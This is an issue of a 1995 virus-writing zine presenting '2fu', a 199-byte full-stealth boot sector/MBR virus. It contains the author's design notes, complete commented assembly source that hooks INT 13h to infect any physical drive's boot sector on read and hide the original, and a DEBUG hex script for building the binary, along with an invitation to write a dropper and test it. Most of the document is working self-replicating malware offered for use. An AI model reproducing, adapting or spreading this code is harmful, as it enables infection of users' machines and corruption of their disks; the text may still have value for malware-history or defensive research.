Insane Reality issue #7 - (c)opyright 1995 Immortal Riot File 017 % [2fu] by Sepultura % ---------------------- Here's yet another contribution virus from our Australian friend Sepultura! It's a really small virus, with a few interesting things (Just read his text, no reason for duplicating). Well, nothing more to say except that I just can't understand why some people use a86 to write viruses. But that sure as hell ain't my problem ;). Thank you very much Sepultura! - The Unforgiven ================================================================== ============== This Virus is TOO FUCKED UP!! This is a full stealth boot sector/MBR virus, with a difference.. (Sepultura Boot in VLAD#5 was a full stealth boot virus with a difference too.. IT DIDN'T HAVE ANY STEALTH!!!). But I'm not the one who made the mistake. The difference is this: most boot sector infectors infect C: on boot up, and then infect drive A: on read/write access. 2fu does things another way. ANY PHYSICAL DRIVE is infected (this excludes things like CD-ROMS, and LOGICAL partions) on any READ attempt from its Boot Sector / MBR (its 1st sector). This may seem detrimental to the viruses ability to replicate, but is in my opinion an advantage. This is for 3 reasons: * 1. It keeps the code short, because it only has to check for one condition on stealths AND infections. * 2. The MBR is read the first time C: is accessed, and every floppy has its BS read by DOS, to see what kind it is. * 3. It doesnt slow normal operations like copies and formats down, and therefore is less visible to the user. My goal in writing this, was to keep things short, as my code is usually VERY unoptimized. I am quite happy with this. It is FULL STEALTH, infects BS/MBRs, on virtually any floppy, and is only 199 bytes long! (14 text, 185 code). It also does not hang on some systems like some other BS virii.. compile it with A86, and stick it on a boot sector at offset 3e... THIS COULD POSSIBLY (HOPEFULLY!) BE THE WORLDS SHORTEST FULL STEALTH VIRUS! ================================================================== ============== radix 16 fat_copies equ B[bx+010] ;We use this info to dir_entries equ W[bx+011] ;calculate what sector fat_sectors equ W[bx+016] ;to store the clean track_sectors equ W[bx+018] ;boot sector in. first_b equ 09c ;1st byte of the virus (pushf) length equ offset vend - offset vstart ;org 0 ;this is just to show the virus ;starts at 03e.. it will place a jmp ;jmp short vstart ;in the BS/MBR to 3e... org 03e ;virus starts at 0:7c3e vstart: pushf ;push flags for simulated int13 call ;later on.. xor di,di ;di=0, copying to start of hiseg l8r. mov ds,di ;ds=cs=0 mov si,413 ;0:413 == amount of conventional RAM dec W[si] ;(in KBs) lodsw ;Allocate 1K shl ax,6 ;Get Hi Segment mov si,7c00 ;copying from 7c00 push ds ;return to 0:7c00 push si ;^^^^^^^^^^^^^^^^ push ds ;load orig sector to 0:7c00 push si ;^^^^^^^^^^^^^^^^^^^^^^^^^^ mov cx,offset int_13_off ;this is the offset of the i13handler push cx ;for later use.. mov es,ax ;Move to HiSegm moving approx 256 rep movsw ;bytes from 0:7c00 to hiseg:0 push ax ;AX = Hi Segment push offset entry retf ;Jump to Hi Seg entry: mov si,4c ;offset of int13 vector pop di ;offset to save int13 vector movsw ;save offset mov W[si-2],offset int_13_handler ;set offset movsw ;save segment mov W[si-2],ax ;set segment pop bx pop es mov ax,0201 ;load orig sector.. i used to have a ;much shorter INT 19 here, but some inc cx ;int19s reset the int 13 handler! jmp short int_13_handler ;stack = PushedFlags, 0, 7c00 ;so this is just like an int13 ;called from 0:7c00 to read the BS ;but because of stealth the clean ;sector is loaded. ; ____________ db '[2Ÿ]Sp—Lįr’' ;_(TO FuCKED uP)_ ; ~~~~~~~~~~~~ int_13_handler: pushf cmp ah,2 jnz no_infect ;read? dec cx jnz fix_cx ;sector 1, track 0? or dh,dh ;head 0? jz read ;if so then its a read of the BS/MBR! fix_cx: inc cx no_infect: ;nah, fuck it popf jmp 0FADE:0DEAD ;FADE + DEAD = FADED? org $-4 int_13_off dw 0BABE ;its not worth commenting int_13_seg dw 0DEAF ;so just remember to H8 Your NMEs... i13: pushf ;calls clean int13 call cs:D[int_13_off] ;some virii use a normal INT 13 ret ;with a special value, like AH=FE ;which the viruses handler turns in ;to AH=02, and then passes it on.. ;this can be shorter, but hangs on ;some systems, because the BIOSes ;handler also calls itself, and the ;system hangs.. it does on mine! read: inc cx popf ;restore CX and Flags call i13 ;do the real thing and save results. pushf ;im not a fugitive on the run pusha ;but a brother like me.. push es ;we going to be another one. mov ax,0201 ;redirect read from BS/MBR cmp es:B[bx+3e],first_b ;infected? jnz no_stealth ;no so infect it call get_last_sect ;to sector containing clean sector.. jmp short i13_exit no_stealth: ;disk is not infected so no need to mov es,cs ;stealth it.... INFECT!! mov bx,200 ;load bs/MBR to es:200 call i13 mov ax,0301 pusha ;save bs/MBR to safe last dir sector call get_last_sect ;get sector to store original in.. call i13 ;save it.. popa ;ax=0301, dx=00## (dl=drive) mov cs:W[bx],3ceb ;start new sector with JMP mov cx,length ;to virus (JMP 3e) mov si,3e ;copy virus into origsector mov di,23e ;at offset 3e rep cs:movsb inc cx ;cx=1. side 0,sector 1. i13_exit: call i13 ;this either writes the infected ;boot sector, or loads the clean ;one for stealthing.. depends where ;it branches from.. exit_inf: pop es ;i got a letter from the government popa ;the other day, opened and read it.. popf ;it said they were suckers retf 2 ;iret without popping flags get_last_sect: ;gets sector to store boot code in.. xchg cx,ax ;save cx inc ax ;harddisk.. sector 2, track 0 cmp dl,80 ;hard disk? jae exit_gls ;get last root dir sector of floppy mov ax,es:fat_sectors ;root dir starts at sector # mul es:fat_copies ;#=fat_sectors * fat_copies inc ax ;#+=1 (add one for the boot sector) ;this works out how many sectors mov si,es:dir_entries ;in the actual directory (ds): shr si,4 ;ds*=64 (512/32) ;(32 bytes in an entry, 512 bytes ;in a sector).. add ax,si ;#+=ds sub ax,es:track_sectors ;ds-=sectors on a track (starts on ;track 2) mov dh,1 ;head 1 always.. exit_gls: xchg cx,ax ;CX=side#,sector# AX=saved_ax ret vend: ================================================================== ============== % "I hate droppers" % ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ - Sepultura, 9th of Dec, 1995, 12.39, C.E.T. So, that's why you have to write a dropper-program youself to install this code starting at offset 3eh in your very own boot-sector if you want to test this virus out yourself. Have fun! N fu.bin E 100 9C 33 FF 8E DF BE 13 04 FF 0C AD C1 E0 06 BE 00 E 110 7C 1E 56 1E 56 B9 94 00 51 8E C0 F3 A5 50 68 60 E 120 00 CB BE 4C 00 5F A5 C7 44 FE 84 00 A5 89 44 FE E 130 5B 07 B8 01 02 41 EB 0E 5B 32 9F 81 5D 53 90 70 E 140 97 4C E7 81 72 92 9C 80 FC 02 75 08 49 75 04 0A E 150 F6 74 0E 41 9D EA BE BA AF DE 9C 2E FF 1E 94 00 E 160 C3 41 9D E8 F4 FF 9C 60 06 B8 01 02 26 80 7F 3E E 170 9C 75 05 E8 30 00 EB 25 0E 07 BB 00 02 E8 DA FF E 180 B8 01 03 60 E8 1F 00 E8 D0 FF 61 2E C7 07 EB 3C E 190 B9 C7 00 BE 3E 00 BF 3E 02 F3 2E A4 41 E8 BA FF E 1a0 07 61 9D CA 02 00 91 40 80 FA 80 73 18 26 8B 47 E 1b0 16 26 F6 67 10 40 26 8B 77 11 C1 EE 04 01 F0 26 E 1c0 2B 47 18 B6 01 91 C3 RCX c7 W Q